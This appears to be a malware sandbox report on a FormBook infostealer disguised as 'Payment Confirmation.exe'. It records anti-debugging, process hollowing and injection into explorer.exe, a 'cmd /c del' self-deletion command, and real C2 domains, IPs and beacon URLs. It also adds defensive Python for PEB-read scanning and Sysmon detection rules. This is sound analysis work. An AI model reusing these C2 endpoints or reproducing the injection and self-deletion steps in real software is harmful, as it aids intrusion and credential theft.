Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04513B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044FFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045A131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0450F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0457FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10009B80 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
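The fs:[00000030h] reads listed above are loads of the PEB pointer from the TEB inside the 32-bit (SysWOW64) msiexec.exe image the sample hollowed. In the 32-bit PEB, BeingDebugged sits at +0x02 and NtGlobalFlag at +0x68, which is why the sandbox files these reads next to the DebugPort queries (NtQueryInformationProcess with the ProcessDebugPort class) as debugger detection. Not every PEB read is anti-debug, though: position-independent code also walks PEB->Ldr (+0x0C) to resolve its imports, so the count alone says little. The scanner below is an added example, not Joe Sandbox's logic; it finds the fs:[0x30] loads in a code buffer and classifies each by the dereference that follows. The input bytes are hand-assembled constructed snippets, not bytes from the sample, and the 24-byte lookahead window and the handful of encodings it recognises are assumptions.

```python
"""Find 32-bit PEB reads (mov reg, fs:[0x30]) in a code buffer and classify
each by the PEB field dereferenced right after it.

Added example for this report, not Joe Sandbox code. The input bytes are
hand-assembled constructed snippets, not bytes taken from the sample."""
from __future__ import annotations
from dataclasses import dataclass

# Register numbers as used in ModRM encodings.
REG = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3}

# Encodings of "mov reg, dword ptr fs:[0x30]" (TEB -> PEB pointer, 32-bit).
PEB_LOADS = {
    b"\x64\xa1\x30\x00\x00\x00": "eax",        # short form, eax only
    b"\x64\x8b\x05\x30\x00\x00\x00": "eax",
    b"\x64\x8b\x0d\x30\x00\x00\x00": "ecx",
    b"\x64\x8b\x15\x30\x00\x00\x00": "edx",
    b"\x64\x8b\x1d\x30\x00\x00\x00": "ebx",
}

WINDOW = 24  # assumption: a follow-on dereference appears within 24 bytes


def _followups(reg: int) -> dict[str, list[bytes]]:
    """Byte patterns that dereference a PEB field through the register holding
    the PEB pointer. ModRM for [reg+disp8] into the same register is
    0x40 | reg<<3 | reg; for a /digit opcode it is 0x40 | digit<<3 | reg."""
    same = bytes([0x40 | (reg << 3) | reg])
    return {
        "BeingDebugged (+0x02)": [
            b"\x0f\xb6" + same + b"\x02",                 # movzx reg, byte ptr [reg+2]
            b"\x80" + bytes([0x78 | reg]) + b"\x02\x00",  # cmp byte ptr [reg+2], 0
        ],
        "NtGlobalFlag (+0x68)": [
            b"\x8b" + same + b"\x68",                     # mov reg, [reg+0x68]
            b"\xf6" + bytes([0x40 | reg]) + b"\x68\x70",  # test byte ptr [reg+0x68], 0x70
        ],
        "Ldr (+0x0C)": [
            b"\x8b" + same + b"\x0c",                     # mov reg, [reg+0x0C]
        ],
    }


@dataclass
class PebAccess:
    offset: int
    register: str
    purpose: str  # one of the labels above, or "unresolved"


def scan_peb_accesses(code: bytes) -> list[PebAccess]:
    """Every PEB load in the buffer, sorted by offset, with its classification."""
    hits = []
    for pattern, regname in PEB_LOADS.items():
        start = 0
        while (i := code.find(pattern, start)) != -1:
            after = i + len(pattern)
            window = code[after:after + WINDOW]
            purpose = "unresolved"
            for label, needles in _followups(REG[regname]).items():
                if any(n in window for n in needles):
                    purpose = label
                    break
            hits.append(PebAccess(i, regname, purpose))
            start = i + 1
    return sorted(hits, key=lambda h: h.offset)


def summarize(code: bytes) -> dict[str, int]:
    """Count accesses per purpose, to separate an API-resolving Ldr walk from
    BeingDebugged / NtGlobalFlag checks."""
    counts = {}
    for h in scan_peb_accesses(code):
        counts[h.purpose] = counts.get(h.purpose, 0) + 1
    return counts


# Constructed, hand-assembled 32-bit snippets (not from the sample).
SAMPLE = b"".join([
    b"\x64\xa1\x30\x00\x00\x00",       # mov eax, fs:[0x30]
    b"\x0f\xb6\x40\x02",               # movzx eax, byte ptr [eax+2]   ; BeingDebugged
    b"\x85\xc0\x75\x10",               # test eax, eax ; jnz
    b"\x90" * 4,
    b"\x64\x8b\x0d\x30\x00\x00\x00",   # mov ecx, fs:[0x30]
    b"\xf6\x41\x68\x70",               # test byte ptr [ecx+0x68], 0x70 ; NtGlobalFlag
    b"\x75\x08",                       # jnz
    b"\x90" * 4,
    b"\x64\xa1\x30\x00\x00\x00",       # mov eax, fs:[0x30]
    b"\x8b\x40\x0c",                   # mov eax, [eax+0x0C]           ; PEB->Ldr
    b"\x8b\x40\x14",                   # mov eax, [eax+0x14]           ; InMemoryOrderModuleList
    b"\xc3",                           # ret
])

if __name__ == "__main__":
    for h in scan_peb_accesses(SAMPLE):
        print(f"+0x{h.offset:04x} {h.register:<3} -> {h.purpose}")
    print(summarize(SAMPLE))
```

Offsets are only valid for 32-bit code; a 64-bit process reads the PEB through gs:[0x60] and NtGlobalFlag moves to +0xBC, so the same scan on a native 64-bit dump would need different patterns.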

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 52.206.159.80 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.91.80.182 80
          Source: C:\Windows\explorer.exeDomain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exeDomain query: www.lumberjackguitarloops.com
          Source: C:\Windows\explorer.exeDomain query: www.elliotpioneer.com
          Source: C:\Windows\explorer.exeDomain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exeDomain query: www.chinaopedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeDomain query: www.anadolu.academy
          Source: C:\Windows\explorer.exeDomain query: www.playstarexch.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.105.103.207 80
          Source: C:\Windows\explorer.exeNetwork Connect: 62.210.5.81 80
          Source: C:\Windows\explorer.exeDomain query: www.altitudebc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.73.147.156 80
          Source: C:\Windows\explorer.exeDomain query: www.unasolucioendesa.com
          Source: C:\Windows\explorer.exeDomain query: www.atp-cayenne.com
          Source: C:\Windows\explorer.exeNetwork Connect: 82.98.134.154 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 9B0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory written: C:\Users\user\Desktop\Payment Confirmation.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Payment Confirmation.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Payment Confirmation.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.386546545.00000000008B8000.00000004.00000020.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100098FF cpuid
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10012E30 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
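Read together, the entries in this section describe one chain: Payment Confirmation.exe starts a copy of itself, the copy unmaps and rewrites msiexec.exe (the hollowing entry, base 9B0000) and queues an APC / sets a thread context in explorer.exe (PID 3440 here), explorer.exe then makes the HTTP contacts listed at the top of the section, and msiexec.exe finally runs cmd.exe /c del against the original file. The Shell_TrayWnd and Progman strings are the window class names of the taskbar and the desktop, consistent with locating explorer.exe through its shell window rather than by process name. The Python below is an added example of how that chain can be expressed as triage rules over Sysmon-style events (Event IDs 1, 3 and 10); it is not the sandbox's logic, and the events are constructed from the observations above rather than exported telemetry. Caveat: explorer.exe opens legitimate connections of its own, so the network rule is a signal to combine with the other stages or with destination reputation, not a verdict on its own.

```python
"""Triage rules for the injection / self-deletion chain described in this
report, expressed over Sysmon-style events (Event IDs 1, 3 and 10).

Added example, not the sandbox's logic. The events below are constructed
from the report's observations, not exported telemetry."""
from __future__ import annotations
import re
from typing import Iterable

SHELL_IMAGES = {"explorer.exe"}            # shell process FormBook injects into here
WINDOWS_DIR = "c:\\windows\\"
USER_DIR = "c:\\users\\"
SELF_DELETE = re.compile(r"/c\s+del\b.+?\.exe", re.IGNORECASE)

# Sysmon EID 10 GrantedAccess bits needed to write and run code in a target.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _under(path: str, prefix: str) -> bool:
    return path.lower().startswith(prefix)


def rule_self_spawn(ev: dict) -> bool:
    """A user-directory binary starting a copy of itself (first step of the
    hollowing chain: process 4 is a child of process 1 in this report)."""
    return (ev["EventID"] == 1
            and ev["Image"].lower() == ev["ParentImage"].lower()
            and _under(ev["Image"], USER_DIR))


def rule_process_access_into_shell(ev: dict) -> bool:
    """Handle to explorer.exe with VM write rights opened from outside
    C:\\Windows, which APC queueing / SetThreadContext injection needs."""
    if ev["EventID"] != 10 or _base(ev["TargetImage"]) not in SHELL_IMAGES:
        return False
    granted = ev["GrantedAccess"]
    granted = int(granted, 16) if isinstance(granted, str) else granted
    return (not _under(ev["SourceImage"], WINDOWS_DIR)
            and granted & INJECT_MASK == INJECT_MASK)


def rule_shell_initiates_http(ev: dict) -> bool:
    """explorer.exe itself initiating an outbound connection on 80/443."""
    return (ev["EventID"] == 3
            and bool(ev.get("Initiated"))
            and _base(ev["Image"]) in SHELL_IMAGES
            and int(ev["DestinationPort"]) in (80, 443))


def rule_self_delete_via_cmd(ev: dict) -> bool:
    """cmd.exe /c del <file>.exe spawned by something other than a shell."""
    return (ev["EventID"] == 1
            and _base(ev["Image"]) == "cmd.exe"
            and _base(ev["ParentImage"]) not in {"cmd.exe", "explorer.exe"}
            and SELF_DELETE.search(ev.get("CommandLine", "")) is not None)


RULES = {
    "self_spawn_from_user_dir": rule_self_spawn,
    "process_access_into_shell": rule_process_access_into_shell,
    "shell_process_initiates_http": rule_shell_initiates_http,
    "self_delete_via_cmd": rule_self_delete_via_cmd,
}


def evaluate(events: Iterable[dict]) -> list[tuple[str, int]]:
    """(rule name, event index) for every rule that fires."""
    return [(name, idx)
            for idx, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


def chain_complete(events: list[dict]) -> bool:
    """True when every stage was seen; individually weak signals add up."""
    return {name for name, _ in evaluate(events)} == set(RULES)


SAMPLE = "C:\\Users\\user\\Desktop\\Payment Confirmation.exe"
EVENTS = [  # constructed from the report's process chain, plus two benign events
    {"EventID": 1, "Image": SAMPLE, "ParentImage": SAMPLE,
     "CommandLine": f"'{SAMPLE}'"},
    {"EventID": 10, "SourceImage": SAMPLE, "TargetImage": "C:\\Windows\\explorer.exe",
     "GrantedAccess": "0x1F0FFF"},
    {"EventID": 3, "Image": "C:\\Windows\\explorer.exe", "Initiated": True,
     "DestinationIp": "172.105.103.207", "DestinationPort": 80},
    {"EventID": 1, "Image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "ParentImage": "C:\\Windows\\SysWOW64\\msiexec.exe",
     "CommandLine": f"/c del '{SAMPLE}'"},
    {"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "Initiated": True, "DestinationIp": "192.0.2.10", "DestinationPort": 443},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "/c dir"},
]

if __name__ == "__main__":
    for name, idx in evaluate(EVENTS):
        print(f"{name:<30} event #{idx}")
    print("chain complete:", chain_complete(EVENTS))
```

Event ID 10 (ProcessAccess) is used for the injection stage instead of Event ID 8 because CreateRemoteThread logging does not see NtQueueApcThread or SetThreadContext; the handle with PROCESS_VM_WRITE | PROCESS_VM_OPERATION is what both need.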

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Techniques with matched signatures, grouped by tactic. The bracketed digits are the signature hit counts carried over from the matrix cells. Initial Access, Lateral Movement, Exfiltration, Network Effects and Remote Service Effects had no matches; their cells held only the unpopulated technique placeholders.

          • Execution: Shared Modules [1]
          • Persistence: DLL Side-Loading [1], Application Shimming [1]
          • Privilege Escalation: Process Injection [612], DLL Side-Loading [1], Application Shimming [1]
          • Defense Evasion: Process Injection [612], Virtualization/Sandbox Evasion [2], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [2], Software Packing [11], DLL Side-Loading [1], File Deletion [1]
          • Credential Access: Input Capture [1]
          • Discovery: System Time Discovery [1], Security Software Discovery [151], Virtualization/Sandbox Evasion [2], Process Discovery [2], Remote System Discovery [1], File and Directory Discovery [2], System Information Discovery [114]
          • Collection: Input Capture [1], Archive Collected Data [1], Clipboard Data [1]
          • Command and Control: Encrypted Channel [1], Ingress Tool Transfer [3], Non-Application Layer Protocol [3], Application Layer Protocol [13]
          • Impact: System Shutdown/Reboot [1]

          Behavior Graph

          Behavior Graph ID: 502129, Sample: Payment Confirmation.exe, Startdate: 13/10/2021, Architecture: WINDOWS, Score: 100

          Process tree with the DNS/IP contacts and signatures attached to each node:

          • Start node. DNS/IP: www.6233v.com, pflvcllbpf.hellomyai.com, 2 other IPs or domains. Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 9 other signatures.
          • Payment Confirmation.exe (17) started. Dropped file: C:\Users\user\AppData\Local\...\nawgsdqut.dll, PE32. Signature: Injects a PE file into a foreign processes.
            • Payment Confirmation.exe started (second instance). Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection).
              • explorer.exe (injected). DNS/IP: www.atp-cayenne.com (62.210.5.81, source port 49842 -> 80, OnlineSASFR, France); www.thesewhitevvalls.com (172.105.103.207, source port 49810 -> 80, LINODE-AP Linode LLC US, United States); 15 other IPs or domains. Signature: System process connects to network (likely due to code injection or exploit).
                • msiexec.exe started. Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process.
                  • cmd.exe (1) started.
                    • conhost.exe started.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Payment Confirmation.exe | 24% | Virustotal |
          Payment Confirmation.exe | 20% | ReversingLabs | Win32.Backdoor.Androm
          Payment Confirmation.exe | 100% | Joe Sandbox ML |

          The ReversingLabs family label (Androm) does not agree with the Yara verdict; the FormBook Yara matches and the extracted C2 configuration are the stronger attribution for this sample.

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll | 3% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.Payment Confirmation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.0.Payment Confirmation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          4.0.Payment Confirmation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.Payment Confirmation.exe.2320000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          11.2.msiexec.exe.49f796c.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
          4.2.Payment Confirmation.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.1.Payment Confirmation.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner
          www.thesewhitevvalls.com | 7% | Virustotal
          chinaopedia.com | 4% | Virustotal
          playstarexch.com | 4% | Virustotal
          anadolu.academy | 1% | Virustotal

          URLs

          Source | Detection | Scanner | Label
          http://www.playstarexch.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== | 0% | Avira URL Cloud | safe
          http://www.chinaopedia.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== | 0% | Avira URL Cloud | safe
          http://www.anadolu.academy/b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz | 0% | Avira URL Cloud | safe
          http://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz | 0% | Avira URL Cloud | safe
          http://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== | 0% | Avira URL Cloud | safe
          http://www.elliotpioneer.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== | 0% | Avira URL Cloud | safe
          http://www.altitudebc.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== | 0% | Avira URL Cloud | safe
          http://www.carts-amazon.com/b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz | 0% | Avira URL Cloud | safe
          http://www.atp-cayenne.com/b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz | 0% | Avira URL Cloud | safe
          www.thesewhitevvalls.com/b2c0/ | 0% | Avira URL Cloud | safe

          Every C2 URL scores 0% and is labelled safe by URL reputation. For freshly registered FormBook infrastructure that is the expected outcome and carries no weight against the verdict; the Snort alert, the Yara family match and the extracted configuration are the signals to act on.

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Reputation
          propage.beatstars.com | 52.206.159.80 | true | false | high
          www.thesewhitevvalls.com | 172.105.103.207 | true | true | unknown
          chinaopedia.com | 45.91.80.182 | true | true | unknown
          playstarexch.com | 34.102.136.180 | true | false | unknown
          HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | 3.223.115.185 | true | false | high
          anadolu.academy | 94.73.147.156 | true | true | unknown
          elliotpioneer.com | 34.102.136.180 | true | false | unknown
          pflvcllbpf.hellomyai.com | 134.122.133.171 | true | true | unknown
          www.unasolucioendesa.com | 82.98.134.154 | true | true | unknown
          www.atp-cayenne.com | 62.210.5.81 | true | true | unknown
          carts-amazon.com | 34.102.136.180 | true | false | unknown
          www.anadolu.academy | unknown | unknown | true | unknown
          www.playstarexch.com | unknown | unknown | true | unknown
          www.lumberjackguitarloops.com | unknown | unknown | true | unknown
          www.altitudebc.com | unknown | unknown | true | unknown
          www.elliotpioneer.com | unknown | unknown | true | unknown
          www.6233v.com | unknown | unknown | true | unknown
          www.carts-amazon.com | unknown | unknown | true | unknown
          www.chinaopedia.com | unknown | unknown | true | unknown

          No antivirus detection was recorded for any of these entries. FormBook walks through its embedded domain list, so the non-flagged names, including the three that resolve to the same address 34.102.136.180 (playstarexch.com, elliotpioneer.com, carts-amazon.com), are expected next to the live hosts; the Malicious column should not be read as the complete C2 list, nor as a list of hosts that were confirmed to answer.

                                        Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.playstarexch.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== | false | Avira URL Cloud: safe | unknown
